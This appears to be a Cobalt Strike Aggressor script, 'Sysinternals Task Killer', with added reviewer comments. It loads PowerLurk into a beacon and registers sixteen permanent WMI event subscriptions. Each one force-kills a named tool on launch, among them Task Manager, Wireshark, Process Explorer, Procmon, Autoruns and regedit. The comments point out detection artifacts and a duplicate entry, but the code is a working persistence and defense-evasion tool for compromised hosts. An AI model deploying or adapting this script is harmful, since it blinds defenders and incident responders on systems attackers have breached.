# Sysinternals Task Killer
#author: bluescreenofjeff
# Automatically kill common Blue Team processes, such as the Sysinternals tools, on launch.
#Based on the command demonstrated by Andrew Luke in his post:
#Creeping on Users with WMI Events: Introducing PowerLurk - https://pentestarmoury.com/2016/07/13/151/
#Save powerlurk.ps1 in the same directory this script is loaded from.
# sysinternalkiller($1)
#   $1 - a beacon id (the popup below calls this once per selected beacon).
#
# Imports powerlurk.ps1 into the beacon, then issues one
# Register-MaliciousWmiEvent per listed process name.  Each registration
# names a WMI event (KillProc1 .. KillProc16), triggers on ProcessStart of
# the given -ProcessName, and runs the -PermanentCommand, which spawns
# "powershell.exe -NoP -C Stop-Process -Id <pid> -Force" against the new
# process.  Returns nothing.
#
# Review notes (defender view):
#   * The -PermanentCommand registrations are permanent WMI event
#     subscriptions by construction; nothing in this script unregisters
#     them, so they are presumably left on the host after the beacon is
#     gone.  The subscription creation itself and the spawned
#     "powershell.exe -NoP -C Stop-Process ..." child process are the
#     artifacts a defender can look for.
#   * $path is assigned without local(), so under Sleep scoping it is a
#     global that remains set after this sub returns.
#   * tcpview.exe is registered twice (KillProc3 and KillProc16).
sub sysinternalkiller {
#temp fix: the file-picker fallback below is commented out, so the
# script_resource() lookup is used unconditionally; if powerlurk.ps1 is
# not next to this script the import below fails rather than prompting.
# if (-exists script_resource("powerlurk.ps1")) {
$path = script_resource("powerlurk.ps1");
# return $path;
# }
# else {
# prompt_file_open("Select the PowerLurk.ps1 file on your system", $null, false, {
# $path = $1;
# return $path;
# });
# }
# Load PowerLurk into the beacon so Register-MaliciousWmiEvent is available
# to the bpowerpick() calls that follow.
bpowershell_import($1, $path);
# One registration per process name; only -EventName and -ProcessName
# differ between the lines, the -PermanentCommand is identical throughout.
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc1 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName taskmgr.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc2 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName wireshark.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc3 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName tcpview.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc4 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procdump.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc5 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procexp.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc6 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procmon.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc7 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName netstat.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc8 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName psloggedon.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc9 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName logonsessions.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc10 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName processhacker.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc11 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName autoruns.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc12 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName autorunsc.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc13 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName regedit.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc14 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName regshot.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc15 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procexp64.exe');
# NOTE(review): tcpview.exe is already registered as KillProc3 above; this
# second subscription for the same process name is redundant.
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc16 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName tcpview.exe');
}
# Beacon context-menu entry "Sysinternal Killer".  In a beacon_bottom popup
# $1 is the list of currently selected beacon ids; sysinternalkiller is
# invoked once for each of them.
popup beacon_bottom {
item "Sysinternal Killer" {
# local() keeps the loop variable out of Sleep's global scope.
local('$bid');
foreach $bid ($1) {
sysinternalkiller($bid);
}
}
}